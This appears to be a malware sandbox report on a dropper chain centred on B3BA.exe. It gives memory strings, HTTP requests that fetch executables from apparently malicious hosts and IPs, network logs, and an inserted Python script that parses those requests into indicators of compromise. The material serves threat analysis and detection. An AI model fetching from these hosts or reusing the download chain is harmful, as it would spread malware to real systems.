                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response
                          Source: B3BA.exe, 0000002A.00000002.701960053.00000000030CD000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23
                          Source: B3BA.exe, 0000002A.00000002.701960053.00000000030CD000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.663930181.0000000002F30000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23Response
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24Response
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2Response
                          Source: B3BA.exe, 0000002A.00000002.701960053.00000000030CD000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3
                          Source: B3BA.exe, 0000002A.00000002.701960053.00000000030CD000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3Response
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4Response
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5Response
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6Response
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7Response
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8Response
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9Response
                          Source: explorer.exe, 00000005.00000000.373648113.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.391811922.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.403574937.000000000095C000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
                          Source: B3BA.exe, 0000002A.00000002.753014761.0000000003403000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.726282162.0000000003230000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://www.google.com/earth/explore/products/plugin.html
                          Source: B3BA.exe, 0000002A.00000002.753014761.0000000003403000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.726282162.0000000003230000.00000004.00000001.sdmpString found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chrome
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chromeMz
                          Source: B3BA.exe, 0000002A.00000002.698077614.000000000305F000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.748298301.0000000003345000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.701628469.0000000003088000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.747432907.000000000332F000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.745378039.0000000003308000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.701761564.000000000309E000.00000004.00000001.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                          Source: B3BA.exe, 00000014.00000002.565709295.0000000003881000.00000004.00000001.sdmp, B3BA.exe, 00000014.00000002.566907931.00000000039F1000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000000.537971963.0000000000402000.00000040.00000001.sdmp, B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: https://api.ip.sb/ip
                          Source: B3BA.exe, 0000002A.00000002.698077614.000000000305F000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.748298301.0000000003345000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.701628469.0000000003088000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.747432907.000000000332F000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.745378039.0000000003308000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.701761564.000000000309E000.00000004.00000001.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                          Source: svchost.exe, 0000001C.00000003.496464238.0000023922591000.00000004.00000001.sdmpString found in binary or memory: https://disneyplus.com/legal.
                          Source: B3BA.exe, 0000002A.00000002.701761564.000000000309E000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                          Source: B3BA.exe, 0000002A.00000002.698077614.000000000305F000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.748298301.0000000003345000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.745378039.0000000003308000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.701761564.000000000309E000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                          Source: B3BA.exe, 0000002A.00000002.748298301.0000000003345000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.701761564.000000000309E000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab4
                          Source: B3BA.exe, 0000002A.00000002.701761564.000000000309E000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                          Source: B3BA.exe, 0000002A.00000002.753014761.0000000003403000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.726282162.0000000003230000.00000004.00000001.sdmpString found in binary or memory: https://get.adob
                          Source: B3BA.exe, 0000002A.00000002.753014761.0000000003403000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.726282162.0000000003230000.00000004.00000001.sdmpString found in binary or memory: https://helpx.ad
                          Source: B3BA.exe, 0000002A.00000002.698077614.000000000305F000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.748298301.0000000003345000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.701628469.0000000003088000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.747432907.000000000332F000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.745378039.0000000003308000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.701761564.000000000309E000.00000004.00000001.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                          Source: B3BA.exe, 0000002A.00000002.698077614.000000000305F000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.748298301.0000000003345000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.701628469.0000000003088000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.747432907.000000000332F000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.745378039.0000000003308000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.701761564.000000000309E000.00000004.00000001.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                          Source: B3BA.exe, 0000002A.00000002.753014761.0000000003403000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.726282162.0000000003230000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.748298301.0000000003345000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
                          Source: B3BA.exe, 0000002A.00000002.753014761.0000000003403000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.726282162.0000000003230000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.748298301.0000000003345000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                          Source: B3BA.exe, 0000002A.00000002.753014761.0000000003403000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.726282162.0000000003230000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_java
                          Source: B3BA.exe, 0000002A.00000002.753014761.0000000003403000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.726282162.0000000003230000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_pdf
                          Source: B3BA.exe, 0000002A.00000002.753014761.0000000003403000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.726282162.0000000003230000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_quicktime
                          Source: B3BA.exe, 0000002A.00000002.753014761.0000000003403000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.726282162.0000000003230000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_real
                          Source: B3BA.exe, 0000002A.00000002.753014761.0000000003403000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.726282162.0000000003230000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.748298301.0000000003345000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
                          Source: B3BA.exe, 0000002A.00000002.753014761.0000000003403000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.726282162.0000000003230000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
                          Source: B3BA.exe, 0000002A.00000002.753014761.0000000003403000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.726282162.0000000003230000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.748298301.0000000003345000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6258784
                          Source: svchost.exe, 0000001C.00000003.496464238.0000023922591000.00000004.00000001.sdmpString found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
                          Source: svchost.exe, 0000001C.00000003.496464238.0000023922591000.00000004.00000001.sdmpString found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
                          Source: B3BA.exe, 0000002A.00000002.698077614.000000000305F000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.748298301.0000000003345000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.701628469.0000000003088000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.747432907.000000000332F000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.745378039.0000000003308000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.701761564.000000000309E000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                          Source: svchost.exe, 0000001C.00000003.498191855.000002392257F000.00000004.00000001.sdmpString found in binary or memory: https://www.tiktok.com/legal/report
                          Source: svchost.exe, 0000001C.00000003.498147484.00000239225A7000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.498274252.0000023922A02000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.498236848.0000023922590000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.498191855.000002392257F000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.498105135.00000239225A7000.00000004.00000001.sdmpString found in binary or memory: https://www.tiktok.com/legal/report/feedback
Source: unknown | DNS traffic detected: queries for: host-data-coin-11.com
Source: C:\Users\user\AppData\Local\Temp\7063.exe | Code function: 17_2_00404BE0 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetSetOptionA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,InternetConnectA,InternetConnectA,HttpOpenRequestA,HttpOpenRequestA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,HeapCreate,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,memcpy,lstrlen,memcpy,lstrlen,lstrlen,memcpy,lstrlen,HttpSendRequestA,HttpQueryInfoA,StrCmpCA,Sleep,InternetReadFile,lstrcat,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,
Source: global traffic | HTTP traffic detected: GET /files/9030_1641816409_7037.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: data-host-coin-8.com
Source: global traffic | HTTP traffic detected: GET /install5.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: unicupload.top
Source: global traffic | HTTP traffic detected: GET /game.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: data-host-coin-8.com
Source: global traffic | HTTP traffic detected: GET /6.php HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: 185.7.214.171:8080
Source: global traffic | HTTP traffic detected: GET /files/6961_1642089187_2359.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: data-host-coin-8.com
Source: global traffic | HTTP traffic detected: GET /files/8474_1641976243_3082.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: data-host-coin-8.com
Source: global traffic | HTTP traffic detected: GET /9.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: a0621298.xsph.ru
Source: global traffic | HTTP traffic detected: GET /3.exe HTTP/1.1 | Host: a0621298.xsph.ru | Accept: */*
Source: global traffic | HTTP traffic detected: GET /advert.msi HTTP/1.1 | Host: a0621298.xsph.ru | Accept: */*
Source: global traffic | HTTP traffic detected: GET /capibar HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: text/plain; charset=UTF-8 | Host: 185.163.204.22
Source: global traffic | HTTP traffic detected: GET /123.exe HTTP/1.1 | Host: a0621298.xsph.ru | Accept: */*
Source: global traffic | HTTP traffic detected: GET //l/f/N2z-VH4BZ2GIX1a33Fax/e946ea03b0a56043b0189e637403106a5b3aad8e HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: 185.163.204.24
Source: global traffic | HTTP traffic detected: GET /442.exe HTTP/1.1 | Host: a0621298.xsph.ru | Accept: */*
Source: global traffic | HTTP traffic detected: GET /files/6961_1642089187_2359.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: data-host-coin-8.com
Source: global traffic | HTTP traffic detected: GET /443.exe HTTP/1.1 | Host: a0621298.xsph.ru | Accept: */*
Source: global traffic | HTTP traffic detected: GET /files/7729_1642101604_1835.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: data-host-coin-8.com
Source: global traffic | HTTP traffic detected: GET /45512.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: a0621298.xsph.ru
Source: global traffic | HTTP traffic detected: GET //l/f/N2z-VH4BZ2GIX1a33Fax/4457553c06dee2e98e4f451cad0abfa16d7760a4 HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: 185.163.204.24
Source: global traffic | HTTP traffic detected: GET /File.exe HTTP/1.1 | Host: a0621298.xsph.ru | Accept: */*
Source: global traffic | HTTP traffic detected: GET /512412.exe HTTP/1.1 | Host: a0621298.xsph.ru | Accept: */*
Source: global traffic | HTTP traffic detected: GET /RM.exe HTTP/1.1 | Host: a0621298.xsph.ru | Accept: */*
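The download requests above fall into three header shapes: Keep-Alive requests carrying the Internet Explorer 11 User-Agent and no Accept header (data-host-coin-8.com, unicupload.top, some a0621298.xsph.ru paths), requests with no User-Agent at all and Accept: */* (the other a0621298.xsph.ru paths), and no-cache requests with no User-Agent to the 185.163.204.x hosts. The /files/ names on data-host-coin-8.com also carry a ten-digit middle field that reads as a Unix epoch inside the analysis window. The script below is an added triage example, not code from the report or from any of the detected families: it parses the request texts (transcribed from the lines above, one header per line as sent on the wire) into IOC records, labels the header shape with names chosen here, decodes the embedded epoch, and notes paths that end in a 40-hex-digit identifier. Reading the middle field as an epoch is this example's interpretation, not a statement the report makes.

```python
"""Added example: turn the HTTP requests listed in the report into IOC records."""
import re
from dataclasses import dataclass, field
from datetime import datetime, timezone
from typing import Dict, List, Optional

UA_IE11 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko"

# Transcribed from the "HTTP traffic detected" lines above (constructed input,
# headers placed on separate lines as they travel on the wire).
REQUESTS = [
    "GET /files/9030_1641816409_7037.exe HTTP/1.1\r\nConnection: Keep-Alive\r\n"
    f"User-Agent: {UA_IE11}\r\nHost: data-host-coin-8.com\r\n\r\n",
    f"GET /6.php HTTP/1.1\r\nConnection: Keep-Alive\r\nUser-Agent: {UA_IE11}\r\n"
    "Host: 185.7.214.171:8080\r\n\r\n",
    "GET /3.exe HTTP/1.1\r\nHost: a0621298.xsph.ru\r\nAccept: */*\r\n\r\n",
    "GET /capibar HTTP/1.1\r\nCache-Control: no-cache\r\nConnection: Keep-Alive\r\n"
    "Pragma: no-cache\r\nContent-Type: text/plain; charset=UTF-8\r\nHost: 185.163.204.22\r\n\r\n",
    "GET //l/f/N2z-VH4BZ2GIX1a33Fax/e946ea03b0a56043b0189e637403106a5b3aad8e HTTP/1.1\r\n"
    "Cache-Control: no-cache\r\nConnection: Keep-Alive\r\nPragma: no-cache\r\nHost: 185.163.204.24\r\n\r\n",
]


@dataclass
class Request:
    method: str
    path: str
    host: str
    port: int
    headers: Dict[str, str] = field(default_factory=dict)


def parse_request(raw: str) -> Request:
    """Parse one HTTP/1.x request head; header names are lower-cased."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers: Dict[str, str] = {}
    for line in header_lines:
        if not line:
            continue
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    host, _, port = headers.get("host", "").partition(":")
    return Request(method, path, host, int(port) if port else 80, headers)


# /files/<n>_<epoch>_<n>.exe : the middle field is read as a Unix epoch (assumption).
EPOCH_IN_NAME = re.compile(r"^/files/\d+_(\d{10})_\d+\.exe$")
# trailing path segment of 40 hex digits (the length of a SHA-1), as on 185.163.204.24
HEX40 = re.compile(r"/([0-9a-f]{40})$")


def embedded_timestamp(path: str) -> Optional[datetime]:
    m = EPOCH_IN_NAME.match(path)
    return datetime.fromtimestamp(int(m.group(1)), tz=timezone.utc) if m else None


def header_profile(req: Request) -> str:
    """Label the header shape; the labels are this example's own, not the report's."""
    h = req.headers
    if h.get("user-agent") == UA_IE11 and "accept" not in h:
        return "ie11-ua-no-accept"
    if "user-agent" not in h and h.get("accept") == "*/*":
        return "no-ua-accept-any"
    if "user-agent" not in h and h.get("pragma") == "no-cache":
        return "no-ua-pragma-nocache"
    return "other"


def extract_iocs(raws: List[str]) -> List[dict]:
    """One record per request: URL, host, port, path, header profile, decoded epoch, 40-hex id."""
    records = []
    for raw in raws:
        req = parse_request(raw)
        ts = embedded_timestamp(req.path)
        hex40 = HEX40.search(req.path)
        port_part = "" if req.port == 80 else f":{req.port}"
        records.append({
            "url": f"http://{req.host}{port_part}{req.path}",
            "host": req.host,
            "port": req.port,
            "path": req.path,
            "profile": header_profile(req),
            "embedded_time": ts.isoformat() if ts else None,
            "hex40_id": hex40.group(1) if hex40 else None,
        })
    return records


if __name__ == "__main__":
    for rec in extract_iocs(REQUESTS):
        print(rec["profile"].ljust(22), rec["embedded_time"] or "-", rec["url"])
```

Run as-is it prints one line per request; feed it the remaining request lines from the report to get the full IOC list. Decoded epochs for the four /files/ names (2022-01-10 to 2022-01-13 UTC) sit just before the response timestamps the report records further down, which is the kind of consistency check worth making before treating such a field as a build or upload time.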
Source: unknown | Network traffic detected: HTTP traffic on port 49865 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49865
Source: unknown | Network traffic detected: HTTP traffic on port 49924 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49863
Source: unknown | Network traffic detected: HTTP traffic on port 49863 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49883
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown | Network traffic detected: HTTP traffic on port 49910 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49879 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49883 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49924
Source: unknown | Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49879
Source: unknown | Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49910
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Thu, 13 Jan 2022 22:29:09 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Raw: 31 39 0d 0a 14 00 00 00 7b fa f6 18 b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00 0d 0a 30 0d 0a 0d 0a | Data Ascii: 19{i+,GO0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Thu, 13 Jan 2022 22:29:10 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a | Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Thu, 13 Jan 2022 22:29:10 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a | Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
